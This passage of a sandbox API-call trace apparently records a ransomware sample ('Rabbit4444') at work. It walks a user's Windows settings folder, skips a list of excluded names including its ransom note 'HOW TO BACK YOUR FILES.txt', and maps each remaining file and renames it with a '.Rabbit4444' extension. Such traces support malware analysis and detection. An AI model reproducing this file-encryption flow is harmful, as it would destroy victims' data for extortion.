FILES.txt") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2=".") returned 1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="..") returned 1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="windows") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="boot") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.784] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms" [0057.784] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.784] lstrlenW (lpString="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms") returned 56 [0057.784] lstrlenW (lpString="Rabbit4444") returned 10 [0057.784] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.784] lstrlenW (lpString=".dll") returned 4 [0057.784] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.784] lstrlenW (lpString=".lnk") returned 4 [0057.784] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.785] lstrlenW (lpString=".ini") returned 4 [0057.785] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.785] lstrlenW (lpString=".sys") returned 4 [0057.785] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.785] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_joindomain.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.785] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.785] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14909567101) returned 1 [0057.785] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1227) returned 1 [0057.785] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.785] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0057.785] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.786] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.787] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14909814040) returned 1 [0057.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0057.788] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.788] CloseHandle (hObject=0x298) returned 1 [0057.788] CloseHandle (hObject=0x278) returned 1 [0057.788] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms.Rabbit4444") returned 184 [0057.788] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_joindomain.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_joindomain.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.788] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32188c64, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32188c64, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", cAlternateFileName="AA516E~1.SET")) returned 1 [0057.788] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2=".") returned 1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="..") returned 1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="windows") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="boot") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.789] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.789] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms" [0057.789] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.789] lstrlenW (lpString="AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms") returned 63 [0057.789] lstrlenW (lpString="Rabbit4444") returned 10 [0057.789] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.789] lstrlenW (lpString=".dll") returned 4 [0057.789] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.789] lstrlenW (lpString=".lnk") returned 4 [0057.789] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.789] lstrlenW (lpString=".ini") returned 4 [0057.789] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.789] lstrlenW (lpString=".sys") returned 4 [0057.789] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.789] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_leaveorganization.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.790] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.790] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14910042984) returned 1 [0057.790] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1262) returned 1 [0057.790] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.790] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0057.790] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.791] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.792] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14910291254) returned 1 [0057.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0057.792] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.792] CloseHandle (hObject=0x298) returned 1 [0057.792] CloseHandle (hObject=0x278) returned 1 [0057.792] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms.Rabbit4444") returned 191 [0057.793] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_leaveorganization.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_leaveorganization.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.793] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323528ad, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x323528ad, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", cAlternateFileName="AA0779~1.SET")) returned 1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2=".") returned 1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="..") returned 1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="windows") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="boot") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.793] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.794] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms" [0057.794] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.794] lstrlenW (lpString="AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms") returned 63 [0057.794] lstrlenW (lpString="Rabbit4444") returned 10 [0057.794] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.794] lstrlenW (lpString=".dll") returned 4 [0057.794] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.794] lstrlenW (lpString=".lnk") returned 4 [0057.794] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.794] lstrlenW (lpString=".ini") returned 4 [0057.794] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.794] lstrlenW (lpString=".sys") returned 4 [0057.794] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.794] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_penandtouchstatus.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.794] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.794] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14910561250) returned 1 [0057.795] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1262) returned 1 [0057.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.795] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.796] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.797] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.797] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.797] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.797] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.797] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14910804260) returned 1 [0057.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.797] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.797] CloseHandle (hObject=0x298) returned 1 [0057.798] CloseHandle (hObject=0x278) returned 1 [0057.798] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms.Rabbit4444") returned 191 [0057.798] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_penandtouchstatus.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_penandtouchstatus.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.799] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3256899a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3256899a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", cAlternateFileName="AAA302~1.SET")) returned 1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2=".") returned 1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="..") returned 1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="windows") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="boot") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.799] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.799] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms" [0057.799] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.799] lstrlenW (lpString="AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms") returned 61 [0057.799] lstrlenW (lpString="Rabbit4444") returned 10 [0057.799] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.799] lstrlenW (lpString=".dll") returned 4 [0057.799] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.800] lstrlenW (lpString=".lnk") returned 4 [0057.800] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.800] lstrlenW (lpString=".ini") returned 4 [0057.800] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.800] lstrlenW (lpString=".sys") returned 4 [0057.800] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.800] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_processorstatus.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.800] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.800] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14911072522) returned 1 [0057.800] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1252) returned 1 [0057.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0057.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.800] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.802] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.803] 